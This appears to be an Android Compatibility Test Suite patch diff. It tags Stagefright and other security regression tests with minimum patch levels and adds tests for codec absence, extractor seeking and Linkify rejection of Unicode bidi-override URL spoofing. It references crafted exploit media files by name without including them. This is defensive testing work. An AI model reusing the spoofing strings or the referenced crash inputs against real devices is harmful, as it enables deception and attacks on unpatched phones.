+ @SecurityTest(minPatchLevel = "2018-11")
public void testStagefright_bug_68664359() throws Exception {
doStagefrightTest(R.raw.bug_68664359, 60000);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-11")
public void testStagefright_bug_110435401() throws Exception {
doStagefrightTest(R.raw.bug_110435401, 60000);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_cve_2017_0474() throws Exception {
doStagefrightTest(R.raw.cve_2017_0474, 120000);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_cve_2017_0765() throws Exception {
doStagefrightTest(R.raw.cve_2017_0765);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-04")
public void testStagefright_cve_2017_13276() throws Exception {
doStagefrightTest(R.raw.cve_2017_13276);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-12")
public void testStagefright_cve_2016_6764() throws Exception {
doStagefrightTest(R.raw.cve_2016_6764);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_cve_2017_13214() throws Exception {
doStagefrightTest(R.raw.cve_2017_13214);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_35467107() throws Exception {
doStagefrightTest(R.raw.bug_35467107);
}
@@ -822,23 +918,23 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-12")
public void testBug_65186291() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_65186291_framelen);
doStagefrightTestRawBlob(R.raw.bug_65186291_hevc, "video/hevc", 1920, 1080, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testBug_67737022() throws Exception {
doStagefrightTest(R.raw.bug_67737022);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_37093318() throws Exception {
doStagefrightTest(R.raw.bug_37093318, (4 * 60 * 1000));
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-05")
public void testStagefright_bug_73172046() throws Exception {
doStagefrightTest(R.raw.bug_73172046);
@@ -850,51 +946,68 @@
}
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-03")
public void testStagefright_cve_2016_0824() throws Exception {
doStagefrightTest(R.raw.cve_2016_0824);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-03")
public void testStagefright_cve_2016_0815() throws Exception {
doStagefrightTest(R.raw.cve_2016_0815);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-05")
public void testStagefright_cve_2016_2454() throws Exception {
doStagefrightTest(R.raw.cve_2016_2454);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-12")
public void testStagefright_cve_2016_6765() throws Exception {
doStagefrightTest(R.raw.cve_2016_6765);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_2508() throws Exception {
doStagefrightTest(R.raw.cve_2016_2508);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testStagefright_cve_2016_6699() throws Exception {
doStagefrightTest(R.raw.cve_2016_6699);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-06")
public void testStagefright_cve_2017_18155() throws Exception {
doStagefrightTest(R.raw.cve_2017_18155);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-07")
public void testStagefright_cve_2018_9423() throws Exception {
doStagefrightTest(R.raw.cve_2018_9423);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-09")
public void testStagefright_cve_2016_3879() throws Exception {
doStagefrightTest(R.raw.cve_2016_3879);
}
+ @SecurityTest(minPatchLevel = "2017-07")
+ public void testStagefright_xaac_not_present() throws Exception {
+ // ensure that the xaac codec is not present
+ MediaCodec codec;
+ String names[] = new String[] { "c2.android.xaac.decoder", "OMX.google.xaac.decoder" };
+ for (String name : names) {
+ Log.w(TAG, "trying to create codec: " + name);
+ try {
+ codec = MediaCodec.createByCodecName(name);
+ fail("not allowed to createByCodecName() for " + name);
+ } catch (IllegalArgumentException e) {
+ // expected
+ Log.w(TAG, "correctly unable to instantiate code for " + name);
+ }
+ }
+ }
+
private void doStagefrightTest(final int rid) throws Exception {
doStagefrightTestMediaPlayer(rid);
doStagefrightTestMediaCodec(rid);
@@ -1378,34 +1491,37 @@
doStagefrightTestRawBlob(R.raw.bug_36215950, "video/hevc", 320, 240);
}
+ @SecurityTest(minPatchLevel = "2017-08")
public void testBug36816007() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_36816007, "video/avc", 320, 240);
}
+ @SecurityTest(minPatchLevel = "2017-05")
public void testBug36895511() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_36895511, "video/hevc", 320, 240);
}
+ @SecurityTest(minPatchLevel = "2017-11")
public void testBug64836894() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_64836894, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testCve_2017_0687() throws Exception {
doStagefrightTestRawBlob(R.raw.cve_2017_0687, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testBug_37930177() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_37930177_hevc, "video/hevc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testBug_37712181() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_37712181_hevc, "video/hevc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-04")
public void testBug_70897394() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_70897394_avc, "video/avc", 320, 240);
}
@@ -1742,4 +1858,68 @@
t.stopLooper();
t.join(); // wait for thread to exit so we're sure the player was released
}
+
+ private void doStagefrightTestExtractorSeek(final int rid, final long offset) throws Exception {
+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+ LooperThread thr = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ try {
+ AssetFileDescriptor fd = getInstrumentation().getContext().getResources()
+ .openRawResourceFd(R.raw.good);
+ mp.setDataSource(fd.getFileDescriptor(),
+ fd.getStartOffset(),
+ fd.getLength());
+ fd.close();
+ } catch (Exception e) {
+ fail("setDataSource of known-good file failed");
+ }
+ synchronized(mpcl) {
+ mpcl.notify();
+ }
+ Looper.loop();
+ mp.release();
+ }
+ });
+ thr.start();
+ synchronized(mpcl) {
+ mpcl.wait();
+ }
+ Resources resources = getInstrumentation().getContext().getResources();
+ MediaExtractor ex = new MediaExtractor();
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ try {
+ ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IOException e) {
+ } finally {
+ closeQuietly(fd);
+ }
+ int numtracks = ex.getTrackCount();
+ String rname = resources.getResourceEntryName(rid);
+ Log.i(TAG, "start mediaextractor test for: " + rname + ", which has " + numtracks + " tracks");
+ for (int t = 0; t < numtracks; t++) {
+ try {
+ ex.selectTrack(t);
+ } catch (IllegalArgumentException e) {
+ Log.w(TAG, "couldn't select track " + t);
+ }
+ ex.seekTo(0, MediaExtractor.SEEK_TO_CLOSEST_SYNC);
+ ex.advance();
+ ex.seekTo(offset, MediaExtractor.SEEK_TO_NEXT_SYNC);
+ try
+ {
+ ex.unselectTrack(t);
+ }
+ catch (Exception e) {
+ }
+ }
+ ex.release();
+ String cve = rname.replace("_", "-").toUpperCase();
+ assertFalse("Device *IS* vulnerable to " + cve,
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ thr.stopLooper();
+ thr.join();
+ }
}
diff --git a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
index ef9316f..d0afec0 100644
--- a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
+++ b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
@@ -39,7 +39,7 @@
}
//Testing security bug: 30229821
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testVisualizer_MalformedConstructor() throws Exception {
final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
final int VISUALIZER_CMD_MEASURE = 0x10001;
diff --git a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
index fc28247..5368e93 100644
--- a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
+++ b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
@@ -33,7 +33,7 @@
* Prior to fixing bug 33300701, decoding resulted in undefined behavior (divide by zero).
* With the fix, decoding will fail, without dividing by zero.
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void test_android_bug_33300701() {
InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33300701);
Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
diff --git a/tests/tests/selinux/selinuxTargetSdk25/Android.mk b/tests/tests/selinux/selinuxTargetSdk25/Android.mk
index 040bc62..f9bfc95 100644
--- a/tests/tests/selinux/selinuxTargetSdk25/Android.mk
+++ b/tests/tests/selinux/selinuxTargetSdk25/Android.mk
@@ -40,9 +40,6 @@
LOCAL_PACKAGE_NAME := CtsSelinuxTargetSdk25TestCases
LOCAL_PRIVATE_PLATFORM_APIS := true
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-
-LOCAL_MIN_SDK_VERSION := 21
-
include $(BUILD_CTS_PACKAGE)
include $(call all-makefiles-under,$(LOCAL_PATH))
diff --git a/tests/tests/selinux/selinuxTargetSdk27/Android.mk b/tests/tests/selinux/selinuxTargetSdk27/Android.mk
index ae9e5bf..37660a3 100644
--- a/tests/tests/selinux/selinuxTargetSdk27/Android.mk
+++ b/tests/tests/selinux/selinuxTargetSdk27/Android.mk
@@ -40,9 +40,6 @@
LOCAL_PACKAGE_NAME := CtsSelinuxTargetSdk27TestCases
LOCAL_PRIVATE_PLATFORM_APIS := true
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-
-LOCAL_MIN_SDK_VERSION := 21
-
include $(BUILD_CTS_PACKAGE)
include $(call all-makefiles-under,$(LOCAL_PATH))
diff --git a/tests/tests/selinux/selinuxTargetSdkCurrent/Android.mk b/tests/tests/selinux/selinuxTargetSdkCurrent/Android.mk
index fa65d3d..63bc768 100644
--- a/tests/tests/selinux/selinuxTargetSdkCurrent/Android.mk
+++ b/tests/tests/selinux/selinuxTargetSdkCurrent/Android.mk
@@ -40,9 +40,6 @@
LOCAL_PACKAGE_NAME := CtsSelinuxTargetSdkCurrentTestCases
LOCAL_PRIVATE_PLATFORM_APIS := true
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-
-LOCAL_MIN_SDK_VERSION := 21
-
include $(BUILD_CTS_PACKAGE)
include $(call all-makefiles-under,$(LOCAL_PATH))
diff --git a/tests/tests/shortcutmanager/throttling/Android.mk b/tests/tests/shortcutmanager/throttling/Android.mk
index eb62622..5a174cc 100644
--- a/tests/tests/shortcutmanager/throttling/Android.mk
+++ b/tests/tests/shortcutmanager/throttling/Android.mk
@@ -38,6 +38,5 @@
ShortcutManagerTestUtils
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 25
include $(BUILD_CTS_PACKAGE)
diff --git a/tests/tests/telecom/Android.mk b/tests/tests/telecom/Android.mk
index e4f99b8..8f46fd7 100644
--- a/tests/tests/telecom/Android.mk
+++ b/tests/tests/telecom/Android.mk
@@ -34,7 +34,6 @@
LOCAL_SRC_FILES := $(call all-java-files-under, src)
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 21
# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/tests/tests/telecom2/Android.mk b/tests/tests/telecom2/Android.mk
index 9ceb4d4..5b22a92 100644
--- a/tests/tests/telecom2/Android.mk
+++ b/tests/tests/telecom2/Android.mk
@@ -48,7 +48,6 @@
--rename-manifest-package android.telecom2.cts \
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 21
# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/tests/tests/telecom3/Android.mk b/tests/tests/telecom3/Android.mk
index fc95b23..3138e6c 100644
--- a/tests/tests/telecom3/Android.mk
+++ b/tests/tests/telecom3/Android.mk
@@ -45,7 +45,6 @@
--rename-manifest-package android.telecom3.cts \
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 25
# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/tests/tests/text/src/android/text/util/cts/LinkifyTest.java b/tests/tests/text/src/android/text/util/cts/LinkifyTest.java
index c0ad4b6..eee20a2 100644
--- a/tests/tests/text/src/android/text/util/cts/LinkifyTest.java
+++ b/tests/tests/text/src/android/text/util/cts/LinkifyTest.java
@@ -935,6 +935,17 @@
domain.length(), email);
}
+ @Test
+ public void testAddLinks_unsupportedCharacters() {
+ String url = "moc.diordna.com";
+ verifyAddLinksWithWebUrlSucceeds(url + " should be linkified", url);
+
+ verifyAddLinksWithWebUrlFails("u202C character should not be linkified", "\u202C" + url);
+ verifyAddLinksWithWebUrlFails("u202D character should not be linkified", url + "\u202D");
+ verifyAddLinksWithWebUrlFails(
+ "u202E character should not be linkified", url + "moc\u202E.diordna.com");
+ }
+
// Utility functions
private static void verifyAddLinksWithWebUrlSucceeds(String msg, String url) {
verifyAddLinksSucceeds(msg, url, Linkify.WEB_URLS);
diff --git a/tests/tests/toast/Android.mk b/tests/tests/toast/Android.mk
index 9ab8465..bcf7b7e 100644
--- a/tests/tests/toast/Android.mk
+++ b/tests/tests/toast/Android.mk
@@ -29,7 +29,6 @@
LOCAL_PACKAGE_NAME := CtsToastTestCases
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 25
include $(BUILD_CTS_PACKAGE)
diff --git a/tests/tests/toastlegacy/Android.mk b/tests/tests/toastlegacy/Android.mk
index 390222d..217fe55 100644
--- a/tests/tests/toastlegacy/Android.mk
+++ b/tests/tests/toastlegacy/Android.mk
@@ -30,7 +30,6 @@
LOCAL_PACKAGE_NAME := CtsToastLegacyTestCases
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 25
include $(BUILD_CTS_PACKAGE)
diff --git a/tests/vr/Android.mk b/tests/vr/Android.mk
index 0c842cf..dfd5655 100644
--- a/tests/vr/Android.mk
+++ b/tests/vr/Android.mk
@@ -36,7 +36,6 @@
LOCAL_SRC_FILES := $(call all-java-files-under, src) ../../apps/CtsVerifier/src/com/android/cts/verifier/vr/MockVrListenerService.java
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 14
# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests